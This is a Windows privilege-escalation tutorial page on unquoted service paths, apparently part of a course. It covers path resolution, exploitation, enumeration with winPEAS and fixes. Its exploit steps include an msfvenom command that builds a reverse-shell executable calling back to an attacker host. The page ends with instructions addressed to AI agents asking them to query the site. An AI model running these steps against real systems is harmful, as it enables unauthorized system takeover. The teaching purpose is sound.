# 8 - Unquoted Service Path
#### Topics
> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass
## **Unquoted Service Path Vulnerability**
The **unquoted service path** vulnerability arises when a Windows service binary's path contains spaces but lacks proper quotation marks. This leads the operating system to search for the service binary using a specific sequence of rules, potentially allowing an attacker to exploit the path traversal behavior.
When starting a service, Windows interprets its binary path as specified in the service configuration. If the path contains spaces and is unquoted, the system checks multiple potential executable paths in order, which can lead to unintended execution.
### **Example Service Configuration**
```bash
SERVICE_NAME: SimpleService
BINARY_PATH_NAME: C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe
```
If the above path is unquoted, Windows will attempt to execute the following binaries in this order:
1. `C:\Users\Quickemu\Downloads\Example.exe`
2. `C:\Users\Quickemu\Downloads\Example Directory\Another.exe`
3. `C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe`
#### **Attack Scenario**
An attacker with write access to any of the intermediary directories can plant a malicious binary, such as `Example.exe`. When the service starts, Windows will execute the malicious binary instead of the intended service binary.
***
## **Exploiting Unquoted Service Paths**
### **Exploit Steps**
1. **Identify the Vulnerable Service**\
View the service configuration:
```bash
sc.exe qc SimpleService
```
2. **Create a Malicious Binary**\
Generate a reverse shell binary:
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
```
3. **Place the Malicious Binary in a Targeted Path**
```bash
move malicious.exe "C:\Users\Quickemu\Downloads\Example Directory\Example.exe"
```
4. **Restart the Service**
```bash
sc.exe stop SimpleService
sc.exe start SimpleService
```
When the service restarts, Windows will execute `Example.exe` instead of `simpleService.exe`, effectively hijacking the service.
***
### **Additional Examples**
#### **Example 1**
For the binary path:
```bash
C:\Program Files (x86)\Company\Company App\App.exe
```
The following binaries will be checked in order:
1. `C:\Program.exe`
2. `C:\Program Files.exe`
3. `C:\Program Files (x86)\Company\Company.exe`
4. `C:\Program Files (x86)\Company\Company App\App.exe`
#### **Example 2**
For the binary path:
```bash
C:\Program\Cool Company\Cool Binary.exe
```
The following binaries will be checked in order:
1. `C:\Program\Cool.exe`
2. `C:\Program\Cool Company\Cool.exe`
3. `C:\Program\Cool Company\Cool Binary.exe`
***
## **Enumeration of Unquoted Service Paths**
**Using winPEAS**
`winPEAS` can identify unquoted service paths.
```bash
.\winPEAS.exe quiet servicesinfo
```
**Example Output**
Look for the following indicators in the output:
```bash
SimpleService(SimpleService)[C:\Users\Quickemu\Downloads\Example Directory\Another\simpleService.exe]
No quotes and Space detected
File Permissions: Quickemu [AllAccess]
Possible DLL Hijacking in binary folder: C:\Users\Quickemu\Downloads\Example Directory (Quickemu [AllAccess])
```
***
## **Fixing the Vulnerability**
### **Fix Using RegEdit**
1. Open the Registry Editor (`regedit.exe`).
2. Navigate to:
```plaintext
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SimpleService
```
3. Locate the `ImagePath` key and add quotes around the binary path:
```plaintext
"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe"
```
### **Fix Using sc.exe**
Use the `sc.exe` command to update the service path with quotes:
```cmd
sc.exe config SimpleService binpath="\"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe\""
```
***
## Other Resources
* [Windows Privilege Escalation: Unquoted Service Path](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqazExSVU3T2otN3JCNFBCcllHUzZiU2hvSkpDQXxBQ3Jtc0tuRWpBWVFzRERsQVlod3p0T2QwM1lTdVBHMWhJV0dMa0hRNm9YZmFZMlhLVF9SSHhrOFRpQ3hjRXNmb1NSdkZNSldRV0lFem5yU1RwdWRPekR4ZHRIUFhDYnFTeWFmcl8tSHM5T01QUk1NSXlGVktiZw\&q=https%3A%2F%2Fwww.hackingarticles.in%2Fwindows-privilege-escalation-unquoted-service-path%2F\&v=Hj3Y40z2dSQ)
* [Fixing Unquoted Search Paths Using Powershell](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqbXVqSUNYS0ZtUk10bEV3cS1SUVZKS0NQbEg0UXxBQ3Jtc0tsS21UTjB6VmJPOUZKajRZMmhyQ3ZEeUVUaEJfZGQ1U0FUcnJhMUtGVkViUVBhOXZsTG1QYXFqQmVVS1JneGR3elFZanFZUFRrWEN2Y1FOc3locWpDSXJHdUM1aHQ3N2k0UXJqelhmNUVFZWRVcHlYRQ\&q=https%3A%2F%2Fwww.itsecguy.com%2Ffixing_unquoted%2F\&v=Hj3Y40z2dSQ)
{% hint style="danger" %}
**Disclaimer**
**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://dev-angelist.gitbook.io/windows-privilege-escalation/8-unquoted-service-path.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.